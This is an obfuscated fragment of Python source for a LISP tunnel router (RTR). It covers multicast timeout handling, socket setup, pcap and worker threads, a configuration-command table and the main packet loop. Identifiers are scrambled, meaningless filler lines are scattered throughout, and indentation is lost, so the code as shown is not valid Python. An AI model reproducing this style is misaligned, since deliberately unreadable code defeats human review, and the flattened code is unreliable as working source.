if 39 - 39: OoO0O00 / OoooooooOO . OoO0O00 * I1ii11iIi11i / OoOoOO00
if 38 - 38: OoO0O00 / ooOoO0o % I1Ii111 * I11i + i11iIiiIii % ooOoO0o
if 61 - 61: I1Ii111 - Ii1I % I1ii11iIi11i / ooOoO0o / iII111i + iIii1I11I1II1
if 87 - 87: I1Ii111 + ooOoO0o + O0 / i1IIi % IiII / I1Ii111
if 64 - 64: OoO0O00 % IiII . I1Ii111 % OoO0O00 + I11i * IiII
if 83 - 83: o0oOOo0O0Ooo % oO0o + I11i % i11iIiiIii + O0
if 65 - 65: iIii1I11I1II1 % oO0o + O0 / OoooooooOO
def O0000oO0o00 ( ) :
o00oO0oo0OO = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
i1OOO = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
if 80 - 80: OoooooooOO + IiII
O00O = [ ]
for Ii1iIiII1ii1 in lisp . lisp_gleaned_groups :
for ooooo0Oo0 in lisp . lisp_gleaned_groups [ Ii1iIiII1ii1 ] :
Oo0oOOooO0o0O = lisp . lisp_gleaned_groups [ Ii1iIiII1ii1 ] [ ooooo0Oo0 ]
oo0o00oOo0 = time . time ( ) - Oo0oOOooO0o0O
if ( oo0o00oOo0 < lisp . LISP_IGMP_TIMEOUT_INTERVAL ) : continue
O00O . append ( [ Ii1iIiII1ii1 , ooooo0Oo0 ] )
if 61 - 61: OOooOOo / OoO0O00 + II111iiii . oO0o / Oo0Ooo * OOooOOo
if 46 - 46: iIii1I11I1II1
if 33 - 33: I11i % I11i % O0 / I1IiiI . i1IIi
if 91 - 91: ooOoO0o * I11i - II111iiii . I1IiiI - Oo0Ooo + ooOoO0o
if 56 - 56: o0oOOo0O0Ooo / IiII * I1IiiI . o0oOOo0O0Ooo
if 15 - 15: i11iIiiIii
if 13 - 13: I11i * II111iiii * oO0o * II111iiii % IiII / I1IiiI
O0O = lisp . bold ( "timed out" , False )
for Ii1iIiII1ii1 , ooooo0Oo0 in O00O :
o00oO0oo0OO . store_address ( Ii1iIiII1ii1 )
i1OOO . store_address ( ooooo0Oo0 )
o000O0o = lisp . green ( Ii1iIiII1ii1 , False )
ooo = lisp . green ( ooooo0Oo0 , False )
lisp . lprint ( "{} RLE {} for gleaned group {}" . format ( o000O0o , O0O , ooo ) )
lisp . lisp_remove_gleaned_multicast ( o00oO0oo0OO , i1OOO )
if 27 - 27: ooOoO0o + i11iIiiIii * I11i + OoOoOO00 + iII111i
if 87 - 87: O0
if 87 - 87: o0oOOo0O0Ooo / II111iiii
if 90 - 90: ooOoO0o - I1ii11iIi11i - O0 + Ii1I
if 68 - 68: OOooOOo . Oo0Ooo % ooOoO0o - OoooooooOO * iII111i . OOooOOo
if 46 - 46: i11iIiiIii - OOooOOo * I1IiiI * I11i % I1ii11iIi11i * i1IIi
if 5 - 5: O0 / ooOoO0o . Oo0Ooo + OoooooooOO
if 97 - 97: IiII . Ii1I . Ii1I / iIii1I11I1II1 - OoO0O00 + iII111i
def II1 ( lisp_raw_socket ) :
lisp . lisp_set_exception ( )
if 52 - 52: OoOoOO00 * OoO0O00 - Ii1I
if 82 - 82: OoO0O00 + I1IiiI . i1IIi + OOooOOo
if 16 - 16: o0oOOo0O0Ooo - OoO0O00 / I1Ii111
if 48 - 48: iIii1I11I1II1
for oO0OOOO0 in list ( lisp . lisp_crypto_keys_by_nonce . values ( ) ) :
for OoooooOo in oO0OOOO0 : del ( OoooooOo )
if 67 - 67: II111iiii / o0oOOo0O0Ooo . OOooOOo . OoooooooOO
lisp . lisp_crypto_keys_by_nonce . clear ( )
lisp . lisp_crypto_keys_by_nonce = { }
if 19 - 19: IiII . I1ii11iIi11i / OoOoOO00
if 68 - 68: ooOoO0o / OoooooooOO * I11i / oO0o
if 88 - 88: o0oOOo0O0Ooo
if 1 - 1: OoooooooOO
lisp . lisp_timeout_map_cache ( lisp . lisp_map_cache )
if 48 - 48: ooOoO0o * OoOoOO00 - ooOoO0o - OOooOOo + OOooOOo
if 40 - 40: i11iIiiIii . iIii1I11I1II1
if 2 - 2: i1IIi * oO0o - oO0o + OoooooooOO % OoOoOO00 / OoOoOO00
if 3 - 3: OoooooooOO
if 71 - 71: IiII + i1IIi - iII111i - i11iIiiIii . I11i - ooOoO0o
lisp . lisp_rtr_nat_trace_cache . clear ( )
lisp . lisp_rtr_nat_trace_cache = { }
if 85 - 85: I1ii11iIi11i - OoOoOO00 / I1ii11iIi11i + OOooOOo - iII111i
if 49 - 49: OoO0O00 - O0 / OoO0O00 * OoOoOO00 + I1Ii111
if 35 - 35: II111iiii . I1IiiI / i1IIi / I1IiiI * oO0o
if 85 - 85: II111iiii . ooOoO0o % OOooOOo % I11i
if 80 - 80: oO0o * I11i / iIii1I11I1II1 % oO0o / iIii1I11I1II1
O0000oO0o00 ( )
if 42 - 42: i1IIi / i11iIiiIii . Oo0Ooo * iII111i . i11iIiiIii * O0
if 44 - 44: i1IIi . I1IiiI / i11iIiiIii + IiII
if 27 - 27: OOooOOo
if 52 - 52: I1Ii111 % OoOoOO00 + iIii1I11I1II1 * oO0o . Ii1I
Iii ( lisp_raw_socket )
if 95 - 95: iIii1I11I1II1 . IiII - OoooooooOO * OoO0O00 / o0oOOo0O0Ooo
if 74 - 74: oO0o
if 34 - 34: iII111i
if 44 - 44: i1IIi % I1IiiI % o0oOOo0O0Ooo
oOOoo00O0O = threading . Timer ( 60 , II1 ,
[ lisp_raw_socket ] )
oOOoo00O0O . start ( )
return
if 9 - 9: Oo0Ooo % OoooooooOO - Ii1I
if 43 - 43: OoO0O00 % OoO0O00
if 46 - 46: Oo0Ooo % iIii1I11I1II1 . iII111i . O0 * ooOoO0o / OoooooooOO
if 7 - 7: oO0o - O0 * I11i - o0oOOo0O0Ooo - II111iiii
if 41 - 41: I1IiiI - I1Ii111 % II111iiii . I1Ii111 - I11i
if 45 - 45: Ii1I - OOooOOo
if 70 - 70: OoO0O00 % I1IiiI / I1IiiI . I11i % ooOoO0o . II111iiii
def I1ii1Ii1 ( ) :
global Ii1iI , Oo0o , I1Ii11I1Ii1i
global o0oOoO00o , i1 , O0ooo00OOo00
global Oo , OOO0o0o
global iIiiI1
if 73 - 73: O0 . oO0o + i11iIiiIii + iIii1I11I1II1 - I11i / OoOoOO00
lisp . lisp_i_am ( "rtr" )
lisp . lisp_set_exception ( )
lisp . lisp_print_banner ( "RTR starting up" )
if 99 - 99: I1ii11iIi11i * oO0o * I1ii11iIi11i - II111iiii + Ii1I
if 72 - 72: o0oOOo0O0Ooo % I1IiiI / iII111i - O0 + I11i
if 83 - 83: O0
if 89 - 89: Oo0Ooo + I1ii11iIi11i - o0oOOo0O0Ooo
if ( lisp . lisp_get_local_addresses ( ) == False ) : return ( False )
if 40 - 40: OoO0O00 + OoO0O00
if 94 - 94: iII111i * iIii1I11I1II1 . I11i
if 13 - 13: iIii1I11I1II1 * OoOoOO00 / I1Ii111 % ooOoO0o + oO0o
if 41 - 41: I1ii11iIi11i
if 5 - 5: Oo0Ooo
if 100 - 100: Ii1I + iIii1I11I1II1
if 59 - 59: IiII
if 89 - 89: OoOoOO00 % iIii1I11I1II1
iIiiI1 = lisp . lisp_myrlocs [ 0 ]
if ( lisp . lisp_on_aws ( ) ) :
III11I1 = lisp . bold ( "AWS RTR" , False )
Oo0OoO00oOO0o = None
for i1iIIi1 in [ "eth0" , "ens5" ] :
Oo0OoO00oOO0o = lisp . lisp_get_interface_address ( i1iIIi1 )
if ( Oo0OoO00oOO0o != None ) : break
if 61 - 61: OoOoOO00 - OoO0O00 + I1IiiI * OOooOOo % OoO0O00
if ( Oo0OoO00oOO0o != None ) :
iIiiI1 = Oo0OoO00oOO0o
iI1Iii = Oo0OoO00oOO0o . print_address_no_iid ( )
lisp . lprint ( "{} using RLOC {} on {}" . format ( III11I1 , iI1Iii , i1iIIi1 ) )
else :
iI1Iii = iIiiI1 . print_address_no_iid ( )
lisp . lprint ( "{} cannot obtain RLOC, using {}" . format ( III11I1 , iI1Iii ) )
if 24 - 24: ooOoO0o - I11i * oO0o
if 87 - 87: Ii1I - I1ii11iIi11i % I1ii11iIi11i . oO0o / I1ii11iIi11i
if 6 - 6: OoOoOO00 / iIii1I11I1II1 * OoooooooOO * i11iIiiIii
if 79 - 79: IiII % OoO0O00
if 81 - 81: i11iIiiIii + i11iIiiIii * OoO0O00 + IiII
if 32 - 32: O0 . OoooooooOO
if 15 - 15: I1IiiI . OoO0O00
if 17 - 17: i11iIiiIii / Oo0Ooo . OoO0O00 / I1IiiI
Ii1 = "0.0.0.0" if lisp . lisp_is_raspbian ( ) else "0::0"
I1Ii11I1Ii1i = lisp . lisp_open_listen_socket ( Ii1 ,
str ( Ooo ) )
Ii1iI = lisp . lisp_open_listen_socket ( "" , "lisp-rtr" )
Oo = lisp . lisp_open_listen_socket ( "" , "lispers.net-itr" )
if 59 - 59: Oo0Ooo % O0 . OoOoOO00
Oo0o [ 0 ] = I1Ii11I1Ii1i
if 41 - 41: i1IIi + II111iiii * ooOoO0o
Oo0o [ 1 ] = lisp . lisp_open_send_socket ( "" , lisp . LISP_AFI_IPV6 )
Oo0o [ 2 ] = Ii1iI
if 68 - 68: Ii1I - I1IiiI
if 41 - 41: oO0o
if 21 - 21: ooOoO0o + o0oOOo0O0Ooo % I1Ii111 + i11iIiiIii + iII111i + II111iiii
if 98 - 98: I1Ii111
if 49 - 49: Oo0Ooo * oO0o + o0oOOo0O0Ooo - i11iIiiIii
if 74 - 74: Oo0Ooo / iIii1I11I1II1 . II111iiii - OoO0O00
if 62 - 62: OOooOOo / II111iiii + OoOoOO00 % ooOoO0o / OoOoOO00 + I1ii11iIi11i
if 2 - 2: i11iIiiIii - I1Ii111 + OoO0O00 % I11i * Ii1I
if 54 - 54: O0 - iII111i . OOooOOo % iII111i + iII111i
o0oOoO00o = socket . socket ( socket . AF_INET , socket . SOCK_RAW ,
socket . IPPROTO_RAW )
o0oOoO00o . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
Oo0o . append ( o0oOoO00o )
if 36 - 36: OOooOOo % i11iIiiIii
if 47 - 47: i1IIi + II111iiii . Oo0Ooo * oO0o . I11i / i1IIi
if 50 - 50: I1Ii111 / i1IIi % OoooooooOO
if 83 - 83: I1ii11iIi11i * I1ii11iIi11i + OOooOOo
if 57 - 57: O0 - O0 . I1ii11iIi11i / o0oOOo0O0Ooo / Ii1I
OOO0o0o = lisp . lisp_open_listen_socket ( "0.0.0.0" ,
str ( lisp . LISP_TRACE_PORT ) )
if 20 - 20: OOooOOo * II111iiii - OoOoOO00 - oO0o * I1Ii111
if ( lisp . lisp_is_raspbian ( ) == False ) :
i1 = socket . socket ( socket . AF_INET6 , socket . SOCK_RAW ,
socket . IPPROTO_UDP )
if 6 - 6: ooOoO0o + OOooOOo / Oo0Ooo + IiII % II111iiii / OoO0O00
if 45 - 45: OoooooooOO
I1 = os . getenv ( "LISP_PCAP_THREADS" )
I1 = 1 if ( I1 == None ) else int ( I1 )
oo = os . getenv ( "LISP_WORKER_THREADS" )
oo = 0 if ( oo == None ) else int ( oo )
if 17 - 17: O0 - OoOoOO00
if 81 - 81: I1IiiI - iIii1I11I1II1 / I1IiiI / O0
if 34 - 34: Ii1I * Ii1I - I1ii11iIi11i - O0 . i11iIiiIii
if 32 - 32: iIii1I11I1II1 . OoO0O00 * oO0o / OOooOOo . II111iiii - Oo0Ooo
for IIIi in range ( I1 ) :
III11IiiiIi1 = lisp . lisp_thread ( "pcap-{}" . format ( IIIi ) )
III11IiiiIi1 . thread_number = IIIi
III11IiiiIi1 . number_of_pcap_threads = I1
III11IiiiIi1 . number_of_worker_threads = oo
O0ooo00OOo00 . append ( III11IiiiIi1 )
threading . Thread ( target = Ooo0O , args = [ III11IiiiIi1 ] ) . start ( )
if 20 - 20: II111iiii - I11i + i1IIi + Ii1I
if 7 - 7: ooOoO0o + Ii1I
if 32 - 32: iIii1I11I1II1 % I1IiiI / i11iIiiIii + OOooOOo - o0oOOo0O0Ooo . iII111i
if 86 - 86: i1IIi / Ii1I * I1IiiI
if 67 - 67: I1ii11iIi11i * I1ii11iIi11i / oO0o * OoooooooOO + OoOoOO00
if 79 - 79: i1IIi
for IIIi in range ( oo ) :
III11IiiiIi1 = lisp . lisp_thread ( "worker-{}" . format ( IIIi ) )
O0ooo00OOo00 . append ( III11IiiiIi1 )
threading . Thread ( target = I1I1iII1i , args = [ III11IiiiIi1 ] ) . start ( )
if 1 - 1: oO0o / i1IIi
if 74 - 74: I11i / OoooooooOO / Oo0Ooo * i11iIiiIii . II111iiii . OoooooooOO
if 59 - 59: i11iIiiIii . OoooooooOO / I11i * I1ii11iIi11i + OoooooooOO
if 3 - 3: i11iIiiIii * Oo0Ooo % iIii1I11I1II1 % I1IiiI * iII111i / OOooOOo
if 95 - 95: IiII * O0 * I1Ii111 . OoooooooOO % Oo0Ooo + I1ii11iIi11i
lisp . lisp_load_checkpoint ( )
if 98 - 98: oO0o . OoooooooOO
if 54 - 54: O0 / IiII % ooOoO0o * i1IIi * O0
if 48 - 48: o0oOOo0O0Ooo . oO0o % OoOoOO00 - OoOoOO00
if 33 - 33: I11i % II111iiii + OoO0O00
lisp . lisp_load_split_pings = ( os . getenv ( "LISP_LOAD_SPLIT_PINGS" ) != None )
if 93 - 93: i1IIi . IiII / I1IiiI + IiII
if 58 - 58: I1ii11iIi11i + O0 . Oo0Ooo + OoOoOO00 - OoO0O00 - OoOoOO00
if 41 - 41: Oo0Ooo / i1IIi / Oo0Ooo - iII111i . o0oOOo0O0Ooo
if 65 - 65: O0 * i11iIiiIii . OoooooooOO / I1IiiI / iII111i
oOOoo00O0O = threading . Timer ( 60 , II1 ,
[ o0oOoO00o ] )
oOOoo00O0O . start ( )
return ( True )
if 69 - 69: ooOoO0o % ooOoO0o
if 76 - 76: i11iIiiIii * iII111i / OoO0O00 % I1ii11iIi11i + OOooOOo
if 48 - 48: iIii1I11I1II1 % i1IIi + OoOoOO00 % o0oOOo0O0Ooo
if 79 - 79: OoOoOO00 % I1IiiI % Ii1I / i1IIi % OoO0O00
if 56 - 56: iIii1I11I1II1 - i11iIiiIii * iII111i
if 84 - 84: OOooOOo + Ii1I + o0oOOo0O0Ooo
if 33 - 33: Ii1I
def ooOOO00oOOooO ( ) :
if 46 - 46: iIii1I11I1II1 . i11iIiiIii - OoOoOO00 % O0 / II111iiii * i1IIi
if 66 - 66: O0
if 52 - 52: OoO0O00 * OoooooooOO
if 12 - 12: O0 + IiII * i1IIi . OoO0O00
lisp . lisp_close_socket ( Oo0o [ 0 ] , "" )
lisp . lisp_close_socket ( Oo0o [ 1 ] , "" )
lisp . lisp_close_socket ( Ii1iI , "lisp-rtr" )
lisp . lisp_close_socket ( I1Ii11I1Ii1i , "" )
lisp . lisp_close_socket ( OOO0o0o , "" )
lisp . lisp_close_socket ( Oo , "lispers.net-itr" )
o0oOoO00o . close ( )
return
if 71 - 71: I1Ii111 - o0oOOo0O0Ooo - OOooOOo
if 28 - 28: iIii1I11I1II1
if 7 - 7: o0oOOo0O0Ooo % IiII * OoOoOO00
if 58 - 58: IiII / I11i + II111iiii % iII111i - OoooooooOO
if 25 - 25: OoOoOO00 % OoooooooOO * Oo0Ooo - i1IIi * II111iiii * oO0o
if 30 - 30: I11i % OoOoOO00 / I1ii11iIi11i * O0 * Ii1I . I1IiiI
if 46 - 46: OoOoOO00 - O0
def O00Ooo ( kv_pair ) :
global Oo0o
global Ooo
if 92 - 92: OoOoOO00 % O0
lispconfig . lisp_map_resolver_command ( kv_pair )
if 55 - 55: iIii1I11I1II1 * iII111i
if ( lisp . lisp_test_mr_timer == None or
lisp . lisp_test_mr_timer . is_alive ( ) == False ) :
lisp . lisp_test_mr_timer = threading . Timer ( 2 , lisp . lisp_test_mr ,
[ Oo0o , Ooo ] )
lisp . lisp_test_mr_timer . start ( )
if 85 - 85: iIii1I11I1II1 . II111iiii
return
if 54 - 54: Ii1I . OoooooooOO % Oo0Ooo
if 22 - 22: OOooOOo
if 22 - 22: iII111i * I11i - Oo0Ooo * O0 / i11iIiiIii
if 78 - 78: Oo0Ooo * O0 / ooOoO0o + OoooooooOO + OOooOOo
if 23 - 23: iII111i % OoooooooOO / iIii1I11I1II1 + I1ii11iIi11i / i1IIi / o0oOOo0O0Ooo
if 94 - 94: i1IIi
if 36 - 36: I1IiiI + Oo0Ooo
if 46 - 46: iII111i
def ooIiI11i1I11111 ( kv_pair ) :
global I1Ii11I1Ii1i , o0oOoO00o , Ooo
if 34 - 34: I1IiiI * OoOoOO00 * oO0o + I1ii11iIi11i
II1i = lisp . lisp_rloc_probing
if 62 - 62: I11i / oO0o % Oo0Ooo . OoooooooOO / i11iIiiIii / I1Ii111
if 60 - 60: I1IiiI % oO0o / o0oOOo0O0Ooo % oO0o * i11iIiiIii / iII111i
if 34 - 34: I1Ii111 - OOooOOo
if 25 - 25: oO0o % I1IiiI + i11iIiiIii + O0 * OoooooooOO
lispconfig . lisp_xtr_command ( kv_pair )
if 64 - 64: i1IIi
if 10 - 10: I1Ii111 % O0 / I1IiiI % I11i
if 25 - 25: II111iiii / OoO0O00
if 64 - 64: O0 % ooOoO0o
if 40 - 40: o0oOOo0O0Ooo + I11i
if ( II1i == False and lisp . lisp_rloc_probing ) :
o00O0OoO = [ I1Ii11I1Ii1i , I1Ii11I1Ii1i ,
None , o0oOoO00o ]
lisp . lisp_start_rloc_probe_timer ( 1 , o00O0OoO )
oO0Oo = { "type" : "itr-crypto-port" , "port" : Ooo }
lisp . lisp_write_to_dp_socket ( oO0Oo )
if 77 - 77: i11iIiiIii % IiII + I1Ii111 % OoooooooOO - I11i
if 26 - 26: Oo0Ooo + O0 - iIii1I11I1II1
if 47 - 47: OoooooooOO
if 2 - 2: OoOoOO00 % I1Ii111 * Oo0Ooo * OoOoOO00
if 65 - 65: i11iIiiIii + Oo0Ooo * OoooooooOO - OoO0O00
lisp . lisp_ipc_write_xtr_parameters ( lisp . lisp_debug_logging ,
lisp . lisp_data_plane_logging )
return
if 26 - 26: o0oOOo0O0Ooo % OOooOOo + OOooOOo % I11i * i11iIiiIii / iII111i
if 64 - 64: oO0o % OoOoOO00 / II111iiii % ooOoO0o - iII111i
if 2 - 2: I1Ii111 - I1ii11iIi11i + o0oOOo0O0Ooo * OoO0O00 / iII111i
if 26 - 26: OOooOOo * Oo0Ooo
if 31 - 31: I11i * oO0o . Ii1I
i1Ii11ii1I = {
"lisp xtr-parameters" : [ ooIiI11i1I11111 , {
"rloc-probing" : [ True , "yes" , "no" ] ,
"nonce-echoing" : [ True , "yes" , "no" ] ,
"data-plane-security" : [ True , "yes" , "no" ] ,
"data-plane-logging" : [ True , "yes" , "no" ] ,
"frame-logging" : [ True , "yes" , "no" ] ,
"flow-logging" : [ True , "yes" , "no" ] ,
"nat-traversal" : [ True , "yes" , "no" ] ,
"checkpoint-map-cache" : [ True , "yes" , "no" ] ,
"ipc-data-plane" : [ True , "yes" , "no" ] ,
"decentralized-push-xtr" : [ True , "yes" , "no" ] ,
"decentralized-pull-xtr-modulus" : [ True , 1 , 0xff ] ,
"decentralized-pull-xtr-dns-suffix" : [ True ] ,
"register-reachable-rtrs" : [ True , "yes" , "no" ] ,
"program-hardware" : [ True , "yes" , "no" ] } ] ,
"lisp interface" : [ lispconfig . lisp_interface_command , {
"interface-name" : [ True ] ,
"device" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"dynamic-eid" : [ True ] ,
"dynamic-eid-device" : [ True ] ,
"lisp-nat" : [ True , "yes" , "no" ] ,
"dynamic-eid-timeout" : [ True , 0 , 0xff ] } ] ,
"lisp map-resolver" : [ O00Ooo , {
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"dns-name" : [ True ] ,
"address" : [ True ] } ] ,
"lisp map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"send-map-request" : [ True , "yes" , "no" ] ,
"subscribe-request" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp rtr-map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp explicit-locator-path" : [ lispconfig . lisp_elp_command , {
"elp-name" : [ False ] ,
"elp-node" : [ ] ,
"address" : [ True ] ,
"probe" : [ True , "yes" , "no" ] ,
"strict" : [ True , "yes" , "no" ] ,
"eid" : [ True , "yes" , "no" ] } ] ,
"lisp replication-list-entry" : [ lispconfig . lisp_rle_command , {
"rle-name" : [ False ] ,
"rle-node" : [ ] ,
"address" : [ True ] ,
"level" : [ True , 0 , 255 ] } ] ,
"lisp json" : [ lispconfig . lisp_json_command , {
"json-name" : [ False ] ,
"json-string" : [ False ] } ] ,
"lisp database-mapping" : [ i11 , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"secondary-instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"dynamic-eid" : [ True , "yes" , "no" ] ,
"signature-eid" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"elp-name" : [ True ] ,
"geo-name" : [ True ] ,
"rle-name" : [ True ] ,
"json-name" : [ True ] ,
"address" : [ True ] ,
"interface" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp glean-mapping" : [ O0O0O , {
"instance-id" : [ False ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"rloc-prefix" : [ True ] ,
"rloc-probe" : [ True , "yes" , "no" ] ,
"igmp-query" : [ True , "yes" , "no" ] } ] ,
"show rtr-rloc-probing" : [ iiii , { } ] ,
"show rtr-keys" : [ o00oOO0 , { } ] ,
"show rtr-map-cache" : [ O00oooo0O , { } ] ,
"show rtr-map-cache-dns" : [ Ii1IOo0o0 , { } ]
}
if 66 - 66: Oo0Ooo / OoooooooOO % I1Ii111 / iII111i + OoooooooOO
if 6 - 6: II111iiii % I1Ii111
if 41 - 41: IiII - II111iiii . II111iiii + I1IiiI
if 59 - 59: iIii1I11I1II1 % Ii1I . i11iIiiIii
if 59 - 59: o0oOOo0O0Ooo . oO0o . Ii1I * OoOoOO00 * OoO0O00 + Oo0Ooo
if 90 - 90: I1Ii111 % Oo0Ooo - Oo0Ooo . iIii1I11I1II1 / OOooOOo + I11i
def o0o00OOOO ( lisp_socket ) :
if 42 - 42: ooOoO0o * iII111i
if 2 - 2: iII111i . OoO0O00 / oO0o
if 41 - 41: OoO0O00 . I1Ii111 * IiII * I1Ii111
if 74 - 74: iIii1I11I1II1 / o0oOOo0O0Ooo
Oo0o0O0o , oO0o0O0Ooo0o , i1I , iI11I = lisp . lisp_receive ( lisp_socket , False )
iii1IiI1i = lisp . lisp_trace ( )
if ( iii1IiI1i . decode ( iI11I ) == False ) : return
if 93 - 93: i1IIi % OoOoOO00 / iIii1I11I1II1 * o0oOOo0O0Ooo . O0 % OOooOOo
if 88 - 88: oO0o % Oo0Ooo - I11i % oO0o + IiII - iII111i
if 23 - 23: O0
if 9 - 9: I11i * Oo0Ooo . ooOoO0o * i11iIiiIii - O0
if 54 - 54: I1IiiI * OOooOOo + o0oOOo0O0Ooo % i1IIi - o0oOOo0O0Ooo + OoOoOO00
iii1IiI1i . rtr_cache_nat_trace ( oO0o0O0Ooo0o , i1I )
if 15 - 15: OoOoOO00 * oO0o + OOooOOo . I11i % I1IiiI - ooOoO0o
if 13 - 13: OoOoOO00 % OoOoOO00 % Oo0Ooo % I1IiiI * i1IIi % I11i
if 82 - 82: IiII . OoOoOO00 / ooOoO0o + iII111i - ooOoO0o
if 55 - 55: ooOoO0o % Oo0Ooo % o0oOOo0O0Ooo
if 29 - 29: IiII / iIii1I11I1II1 + I1ii11iIi11i % iII111i % I11i
if 46 - 46: iIii1I11I1II1
if 70 - 70: i1IIi . I11i
if ( I1ii1Ii1 ( ) == False ) :
lisp . lprint ( "lisp_rtr_startup() failed" )
lisp . lisp_print_banner ( "RTR abnormal exit" )
exit ( 1 )
if 74 - 74: I11i
if 58 - 58: iIii1I11I1II1 * OoO0O00 * I1Ii111 * ooOoO0o . OoooooooOO
II1IIiiI1 = [ I1Ii11I1Ii1i , Ii1iI ,
Oo , OOO0o0o ]
O00O00 = [ I1Ii11I1Ii1i ] * 3
if 66 - 66: Oo0Ooo - iIii1I11I1II1
while ( True ) :
try : iIiIIi11iI , ooo00o0o , oO00oo0o00o0o = select . select ( II1IIiiI1 , [ ] , [ ] )
except : break
if 56 - 56: OoOoOO00 % I1ii11iIi11i - Ii1I % iIii1I11I1II1
if 76 - 76: OoooooooOO * OoooooooOO - iII111i - iIii1I11I1II1 . OoooooooOO / I1ii11iIi11i
if 86 - 86: ooOoO0o
if 51 - 51: OoO0O00 - i11iIiiIii * I1IiiI
if ( lisp . lisp_ipc_data_plane and Oo in iIiIIi11iI ) :
lisp . lisp_process_punt ( Oo , Oo0o ,
Ooo )
if 95 - 95: OOooOOo % I1ii11iIi11i + o0oOOo0O0Ooo % ooOoO0o
if 36 - 36: O0 / i1IIi % II111iiii / iII111i
if 96 - 96: Oo0Ooo / oO0o . II111iiii . Oo0Ooo
if 91 - 91: II111iiii . OOooOOo + o0oOOo0O0Ooo
if 8 - 8: OOooOOo * Oo0Ooo / iII111i - OoO0O00 - OoooooooOO
if ( OOO0o0o in iIiIIi11iI ) :
o0o00OOOO ( OOO0o0o )
if 100 - 100: oO0o . iIii1I11I1II1 . iIii1I11I1II1
if 55 - 55: oO0o
if 37 - 37: IiII / i11iIiiIii / Oo0Ooo
if 97 - 97: I1Ii111 . I11i / I1IiiI
if 83 - 83: I11i - I1ii11iIi11i * oO0o
if ( I1Ii11I1Ii1i in iIiIIi11iI ) :
Oo0o0O0o , oO0o0O0Ooo0o , i1I , iI11I = lisp . lisp_receive ( O00O00 [ 0 ] ,
False )
if ( oO0o0O0Ooo0o == "" ) : break
if ( lisp . lisp_is_rloc_probe_request ( iI11I [ 0 : 1 ] ) ) :
lisp . lprint ( "RTR ignoring RLOC-probe request, using pcap" )
continue
if 90 - 90: Oo0Ooo * I1IiiI
if ( lisp . lisp_is_rloc_probe_reply ( iI11I [ 0 : 1 ] ) ) :
lisp . lprint ( "RTR ignoring RLOC-probe reply, using pcap" )
continue
if 75 - 75: I1ii11iIi11i - OoOoOO00 * i11iIiiIii . OoooooooOO - Oo0Ooo . I11i
lisp . lisp_parse_packet ( O00O00 , iI11I , oO0o0O0Ooo0o , i1I )
if 6 - 6: I11i * oO0o / OoooooooOO % Ii1I * o0oOOo0O0Ooo
if 28 - 28: IiII * I1IiiI % IiII
if 95 - 95: O0 / I11i . I1Ii111
if 17 - 17: I11i
if 56 - 56: ooOoO0o * o0oOOo0O0Ooo + I11i
if 48 - 48: IiII * OoO0O00 % I1Ii111 - I11i
if ( Ii1iI in iIiIIi11iI ) :
Oo0o0O0o , oO0o0O0Ooo0o , i1I , iI11I = lisp . lisp_receive ( Ii1iI , True )
if 72 - 72: i1IIi % ooOoO0o % IiII % oO0o - oO0o
if ( oO0o0O0Ooo0o == "" ) : break
if 97 - 97: o0oOOo0O0Ooo * O0 / o0oOOo0O0Ooo * OoO0O00 * Oo0Ooo
if ( Oo0o0O0o == "command" ) :
if ( iI11I == "clear" ) :
lisp . lisp_clear_map_cache ( )
continue
if 38 - 38: I1Ii111
if ( iI11I . find ( "clear%" ) != - 1 ) :
lispconfig . lisp_clear_decap_stats ( iI11I )
continue
if 25 - 25: iIii1I11I1II1 % II111iiii / I11i / I1ii11iIi11i
lispconfig . lisp_process_command ( Ii1iI , Oo0o0O0o ,
iI11I , "lisp-rtr" , [ i1Ii11ii1I ] )
elif ( Oo0o0O0o == "api" ) :
lisp . lisp_process_api ( "lisp-rtr" , Ii1iI , iI11I )
elif ( Oo0o0O0o == "data-packet" ) :
ooO0o ( iI11I , "" )
else :
if ( lisp . lisp_is_rloc_probe_request ( iI11I [ 0 : 1 ] ) ) :
lisp . lprint ( "RTR ignoring RLOC-probe request, using pcap" )
continue
if 22 - 22: oO0o * iII111i
if ( lisp . lisp_is_rloc_probe_reply ( iI11I [ 0 : 1 ] ) ) :
lisp . lprint ( "RTR ignoring RLOC-probe reply, using pcap" )
continue
if 4 - 4: OoOoOO00 - oO0o + I1IiiI
lisp . lisp_parse_packet ( Oo0o , iI11I , oO0o0O0Ooo0o , i1I )
if 36 - 36: IiII
if 19 - 19: OoOoOO00 . o0oOOo0O0Ooo . OoooooooOO
if 13 - 13: OOooOOo . Oo0Ooo / II111iiii
if 43 - 43: iIii1I11I1II1 % OoO0O00
ooOOO00oOOooO ( )
lisp . lisp_print_banner ( "RTR normal exit" )
exit ( 0 )
if 84 - 84: Oo0Ooo
if 44 - 44: OoooooooOO * i11iIiiIii / Oo0Ooo
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
